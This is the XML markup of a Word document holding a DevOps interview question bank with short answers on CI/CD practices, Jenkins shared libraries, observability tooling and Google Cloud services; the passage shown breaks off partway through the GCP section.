        <w:t>Progressive Delivery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Q548. What is Argo Rollouts?</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Q549. Explain deployment metrics.</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Q550. What is deployment frequency?</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Q551. Explain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Q552. What is lead time for changes?</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Q553. Explain DORA metrics.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: DORA metrics measure software delivery performance using deployment frequency, lead time for changes, change failure rate, and MTTR. They help teams improve delivery speed and reliability together.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>DORA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Q554. What is policy as code?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Policy as code means writing governance, security, and compliance rules as executable code. It allows automated enforcement in CI/CD, Kubernetes admission, Terraform plans, and cloud environments.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Policy As Code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Q555. Explain OPA.</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Q556. What is CI/CD anti-pattern?</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Q557. Explain environment promotion.</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Q558. What is release management?</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Q559. Explain infrastructure pipeline.</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Q560. What is build reproducibility?</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Q561. Explain dependency scanning.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Dependency scanning checks third-party libraries and packages for known vulnerabilities, license risks, and outdated versions. It is a key supply-chain security control in CI/CD.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Dependency Scanning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Q562. What is SAST?</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Q563. Explain DAST.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: DAST, or Dynamic Application Security Testing, tests a running application from the outside to find security issues. It can detect problems such as authentication flaws, exposed endpoints, and runtime misconfigurations.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Dast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Q564. What is software supply chain security?</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Q565. Explain SBOM generation.</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Q566. What is pipeline observability?</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Q567. Explain flaky tests.</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Q568. What is deployment freeze?</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Q569. Explain rollback automation.</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Q570. What is feature flag?</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Q571. Explain LaunchDarkly.</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Q572. What is chaos deployment testing?</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Q573. Explain pipeline security.</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Q574. What are ephemeral environments?</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Q575. Explain preview environments.</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Q576. What is CI/CD for ML?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: CI/CD for ML extends software pipelines with data validation, feature checks, training workflows, experiment tracking, model evaluation, model registry promotion, and controlled model deployment. Both code changes and data changes can trigger the pipeline.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>CI/CD For ML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Q577. Explain model deployment automation.</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Q578. What is automated rollback?</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Q579. Explain release strategies.</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Q580. What are common CI/CD bottlenecks?</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Q581. Explain artifact promotion.</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Q582. What is environment drift?</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Q583. Explain GitOps for Kubernetes.</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Q584. What is infra drift?</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Q585. Explain pipeline scalability.</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Q586. What is monorepo CI?</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Q587. Explain polyrepo pipelines.</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Q588. What are common GitOps interview scenarios?</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Q589. Design a production-grade GitOps pipeline.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Q590. Jenkins shared library structure: How would you structure a Jenkins shared library repository using the vars/ and src/ directories, and what belongs in each?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A Jenkins shared library repo typically has vars/, src/, and optionally resources/. vars/ holds global pipeline steps, one Groovy file per step (e.g. vars/deployApp.groovy), each callable directly as a function in a Jenkinsfile (deployApp(env: 'prod')); an optional matching vars/deployApp.txt provides documentation shown in the Global Variable Reference. src/ holds reusable Groovy classes following standard package layout (src/org/company/DeployHelper.groovy), used for shared logic, models, and utilities that vars/ steps call into rather than duplicating logic across steps. resources/ holds non-Groovy files - templates, shell scripts, JSON/YAML fragments - loaded at runtime via libraryResource(). Keeping vars/ thin (orchestration only) and pushing real logic into src/ classes makes the library unit-testable and easier to reason about.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q591. Jenkins shared library versioning: How would you version a Jenkins shared library and safely roll out a breaking change without breaking every pipeline that already uses it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Tag releases in the shared library repo (semantic version tags or branches), and have every consuming Jenkinsfile pin an explicit version rather than trusting a moving default: @Library('deploy-lib@v2.1.0') _. For a breaking change, cut a new major version (v3.x) on its own branch/tag while leaving v2.x fully intact and available, migrate pipelines to v3 gradually team by team, and only retire v2 once nothing references it. Avoid letting teams default to @Library('deploy-lib@master') or 'latest' in production pipelines, since that silently pulls in unreviewed changes; reserve unpinned references for a dedicated dev/test pipeline that intentionally validates the library's HEAD before it gets tagged.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q592. Jenkins shared library testing: How would you unit test Jenkins shared library Groovy code before it reaches production pipelines?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use the JenkinsPipelineUnit framework (lesfurets/JenkinsPipelineUnit) to unit test vars/ steps and src/ classes outside of a real Jenkins controller - it mocks the Pipeline DSL (sh, checkout, withCredentials, etc.) so tests run fast in plain JUnit/Spock without needing Jenkins infrastructure. Run these tests automatically in CI on every pull request to the shared library repo, and block merges/tags on failing tests, the same discipline you'd apply to application code. For higher-risk changes, follow up with an integration test against a real staging Jenkins instance running an actual pipeline that uses the library, since DSL mocks can't catch every real-world Jenkins behavior.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q593. Jenkins shared library secrets: A shared library step needs to call an internal deployment API. How would you handle credentials inside the shared library safely, without hardcoding secrets into the library code?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Never embed secrets in the library's Groovy source - the library code should be credential-agnostic. Store the actual secret in the Jenkins Credentials Store, scoped to the folder/team that owns it, and have the vars/ step accept a credentialsId parameter that the calling Jenkinsfile supplies (deployApp(credentialsId: 'prod-deploy-token')). Inside the step, bind it at call time with withCredentials([string(credentialsId: params.credentialsId, variable: 'TOKEN')]) so the token only exists in memory for the duration of that block and is automatically masked in console logs. This keeps the library reusable across teams while each team controls and scopes its own credential.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q594. Global vs @Library shared library: What is the difference between a globally trusted Jenkins shared library and one explicitly loaded with @Library('name@version') in a specific Jenkinsfile?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A global shared library is registered under Manage Jenkins &gt; System &gt; Global Pipeline Libraries and, if configured as implicitly loaded, is automatically available to every pipeline without an @Library annotation; it can also be marked 'trusted', meaning it runs outside the Groovy sandbox and is allowed to call sensitive APIs (useful for library code that needs privileged operations, but it means anyone who can edit that repo effectively has elevated trust). A library loaded explicitly via @Library('name@version') in a Jenkinsfile is scoped to that pipeline only, defaults to running inside the Groovy sandbox unless explicitly trusted, and - critically - lets each pipeline pin the exact version it depends on instead of silently inheriting whatever the global default currently points to. Explicit, versioned loading is the safer default for anything beyond a small trusted platform team.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q595. Jenkins shared library parameters: How would you design a shared library step so different teams can pass their own parameters (e.g. image name, namespace, environment) without copy-pasting pipeline logic?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Design the vars/ step to accept a single Map via a call(Map config) signature rather than a long positional argument list, so teams invoke it as deployApp(image: 'svc:1.2.3', namespace: 'team-a', environment: 'staging'). Provide sensible defaults for optional keys, validate required keys up front and fail fast with a clear error message naming the missing key, and document the expected keys in the matching vars/deployApp.txt. This keeps the deployment logic itself in exactly one place while letting every team's Jenkinsfile stay a short, declarative call that only specifies what's different for them - which is exactly the drift problem a shared library is meant to solve.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Observability &amp; Monitoring (451–540)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q596. Explain monitoring vs observability.</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Q597. What are logs, metrics, and traces?</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Q598. Explain Prometheus.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Prometheus is an open-source metrics and alerting system that scrapes time-series metrics from targets. It uses PromQL, labels, exporters, and Alertmanager for cloud-native monitoring.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>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Q599. What is Grafana?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Grafana is a visualization and dashboarding platform for metrics, logs, traces, and other data sources. It is commonly used with Prometheus, Loki, Elasticsearch, and cloud monitoring systems.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Grafana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Q600. What is Loki?</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Q601. What is Jaeger?</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Q602. Explain distributed tracing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Distributed tracing follows a request as it moves through multiple services. It helps identify latency bottlenecks, failed dependencies, and service interactions.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Distributed Tracing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Q603. What is metric cardinality?</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Q604. Explain Prometheus exporters.</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Q605. What is node exporter?</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Q606. Explain kube-state-metrics.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: kube-state-metrics exposes Kubernetes object state as Prometheus metrics. It reports information about deployments, pods, nodes, jobs, replicas, and resource requests.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Kube-state-metrics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Q607. What is Alertmanager?</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Q608. Explain alert routing.</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Q609. What is log aggregation?</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Q610. Explain centralized logging.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Centralized logging stores application, infrastructure, and audit logs in one managed platform. It enables search, correlation, retention policies, dashboards, and alerting.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Centralized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Q611. What is correlation ID?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A correlation ID is a unique identifier attached to a request and propagated across services. It helps connect logs, traces, and events for one user action or transaction.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Correlation Id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Q612. Explain RED metrics.</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Q613. What is USE methodology?</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Q614. Explain SLI.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: An SLI is a Service Level Indicator, a measurable signal of service reliability such as availability, latency, error rate, or freshness.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>SLI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Q615. What is SLO?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: An SLO is a Service Level Objective, a target value for an SLI over a time window. It defines what reliability level the team aims to provide.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>SLO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Q616. Explain SLA.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: An SLA is a Service Level Agreement, usually a formal contract with customers that defines reliability commitments and consequences if they are missed.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>SLA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Q617. What is error budget?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: An error budget is the allowed amount of unreliability within an SLO period. It helps balance release speed and reliability by guiding when to slow changes or improve stability.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Error Budget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Q618. Explain golden signals.</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Q619. What is blackbox monitoring?</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Q620. Explain whitebox monitoring.</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Q621. What is synthetic monitoring?</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Q622. Explain tracing context propagation.</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Q623. What is Fluentd?</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Q624. Explain Fluent Bit.</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Q625. What is Filebeat?</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Q626. Explain Logstash.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Logstash is an Elastic data processing pipeline that ingests, transforms, enriches, and routes logs and events.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Logstash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Q627. What is Kibana?</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Q628. Explain retention policies.</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Q629. What is log sampling?</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Q630. Explain high-cardinality metrics.</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Q631. What is histogram metric?</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Q632. Explain summary metric.</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Q633. What is PromQL?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Q634. Explain Grafana dashboards.</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Q635. What is alert fatigue?</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Q636. Explain alert tuning.</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Q637. What is anomaly detection?</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Q638. Explain observability in Kubernetes.</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Q639. What is application instrumentation?</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Q640. Explain APM.</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Q641. What is Datadog?</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Q642. Explain New Relic.</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Q643. What is Splunk?</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Q644. Explain distributed systems monitoring.</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Q645. What is tracing overhead?</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Q646. Explain service dependency mapping.</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Q647. What is incident detection?</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Q648. Explain observability pipeline.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: An observability pipeline collects, filters, enriches, samples, routes, and stores telemetry data. It helps control cost, protect sensitive data, and deliver the right signals to the right tools.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Observability Pipeline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Q649. What is OpenSearch?</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Q650. Explain metrics retention.</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Q651. What is capacity monitoring?</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Q652. Explain performance baselining.</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Q653. What is dashboard sprawl?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Q654. Explain SRE monitoring strategy.</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Q655. What is root cause analysis?</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Q656. Explain MTTA.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: MTTA, or Mean Time To Acknowledge, measures how long it takes for responders to acknowledge an alert or incident. Lower MTTA comes from good routing, ownership, and on-call readiness.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>MTTA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Q657. What is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Q658. Explain monitoring anti-patterns.</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Q659. What is noise reduction?</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Q660. Explain observability for ML systems.</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Q661. What is model monitoring?</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Q662. Explain drift alerting.</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Q663. What is business metrics monitoring?</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Q664. Explain synthetic transactions.</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Q665. What is uptime monitoring?</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Q666. Explain latency percentile.</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Q667. What is p99 latency?</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Q668. Explain distributed logging.</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Q669. What is telemetry data?</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Q670. Explain event correlation.</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Q671. What is observability maturity?</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Q672. Explain trace sampling.</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Q673. What is monitoring federation?</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Q674. Explain long-term storage in Prometheus.</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Q675. What is Thanos?</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Q676. Explain Cortex.</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Q677. What is VictoriaMetrics?</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Q678. Explain observability cost optimization.</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Q679. What are common monitoring failures?</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Q680. Explain monitoring architecture.</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Q681. What is proactive monitoring?</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Q682. Design an enterprise observability platform.</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pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>GCP &amp; Cloud Engineering (541–650)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q683. What is Google Cloud Platform?</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Q684. Explain GCP regions and zones.</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Q685. What is Compute Engine?</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Q686. What is Cloud Run?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Cloud Run is a fully managed serverless container platform. It runs containers that scale automatically based on requests and can scale to zero when idle.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Cloud Run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Q687. Explain App Engine.</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Q688. What is Cloud Functions?</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Q689. Explain Pub/Sub.</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Q690. What is BigQuery?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: BigQuery is GCP’s serverless data warehouse for large-scale analytics. It supports SQL, partitioned tables, streaming ingestion, ML features, and integration with many data tools.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Bigquery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Q691. Explain Cloud Storage.</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Q692. What is Filestore?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Filestore is a managed network file storage service for applications that need shared POSIX-compatible file systems. It is useful for workloads such as content management, analytics, and Kubernetes persistent storage.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Filestore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Q693. Explain Cloud SQL.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Cloud SQL is GCP’s managed relational database service for MySQL, PostgreSQL, and SQL Server. It handles backups, patching, replication, high availability, and monitoring.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Cloud Sql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Q694. What is Spanner?</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Q695. Explain Firestore.</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Q696. What is Memorystore?</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Q697. What is Shared VPC?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Shared VPC lets multiple projects use a centrally managed network from a host project. It supports enterprise separation of duties between networking teams and application teams.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Shared VPC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Q698. Explain VPC peering.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: VPC peering privately connects two VPC networks so resources can communicate without traversing the public internet. It is useful for cross-project or cross-team private connectivity.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>VPC Peering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Q699. What is Cloud NAT?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Cloud NAT provides outbound internet access for private resources without assigning them public IP addresses. It improves security while allowing updates, API calls, and external downloads.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Cloud Nat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Q700. Explain Cloud Router.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Cloud Router dynamically exchanges routes between GCP and external networks using BGP. It is commonly used with Cloud VPN and Cloud Interconnect.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:b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Q701. What is IAM in GCP?</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Q702. What is Workload Identity?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Workload Identity lets Kubernetes workloads access GCP services using mapped Google service accounts instead of long-lived keys. It improves security for GKE applications.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Workload Identity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Q703. Explain organization policies.</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Q704. What is Cloud Armor?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Cloud Armor is GCP’s web application firewall and DDoS protection service. It protects HTTP(S) load-balanced applications using security policies, rate limiting, bot controls, and managed rules.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Cloud Armor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Q705. Explain Identity-Aware Proxy.</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Q706. What is Cloud CDN?</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Q707. Explain load balancing in GCP.</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Q708. What is Internal Load Balancer?</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Q709. Explain External Load Balancer.</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Q710. What is Cloud DNS?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Cloud DNS is GCP’s managed authoritative DNS service. It provides scalable public and private DNS zones with IAM controls and integration with cloud infrastructure.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Cloud DNS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Q711. Explain Cloud Monitoring.</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Q712. What is Cloud Logging?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Cloud Logging collects, stores, searches, and routes logs from GCP services, applications, and infrastructure. It supports log sinks, retention, alerting, and audit analysis.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Cloud Logging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Q713. Explain Error Reporting.</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Q714. What is Cloud Trace?</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Q715. Explain Cloud Profiler.</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Q716. What is Anthos?</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Q717. Explain Config Connector.</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Q718. What is Deployment Manager?</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Q719. Explain Artifact Registry.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Artifact Registry is GCP’s managed repository service for container images and language packages. It replaces Container Registry and supports IAM, vulnerability scanning, and regional repositories.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Artifact Registry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Q720. Explain Binary Authorization.</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Q721. What is Cloud Build?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Cloud Build is GCP’s managed CI/CD service for building, testing, scanning, and deploying code. It uses build steps, triggers, service accounts, and integrations with Artifact Registry and GKE.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Cloud Build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Q722. Explain Secret Manager.</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Q723. What is Dataflow?</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Q724. Explain Dataproc.</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Q725. What is Vertex AI?</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Q726. Explain Vertex AI Pipelines.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Vertex AI Pipelines orchestrates ML workflows using components and DAGs. It supports reproducible training, evaluation, model registration, and deployment automation.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Vertex Ai Pipelines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Q727. What is AI Platform?</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Q728. Explain TPU in GCP.</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Q729. What is GPU scheduling in GCP?</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Q730. Explain Cloud Composer.</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Q731. What is Eventarc?</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Q732. Explain hybrid cloud with GCP.</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Q733. What is multi-cloud architecture?</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Q734. Explain cloud cost optimization.</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Q735. What is committed use discount?</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Q736. Explain autoscaling in GCP.</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Q737. What is preemptible VM?</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Q738. Explain spot VMs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Spot VMs are discounted Compute Engine instances that can be reclaimed by Google when capacity is needed. They are useful for flexible workloads such as batch processing, CI jobs, and ML training with checkpointing.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Spot Vms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Q739. What is cloud security posture?</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Q740. Explain VPC Service Controls.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
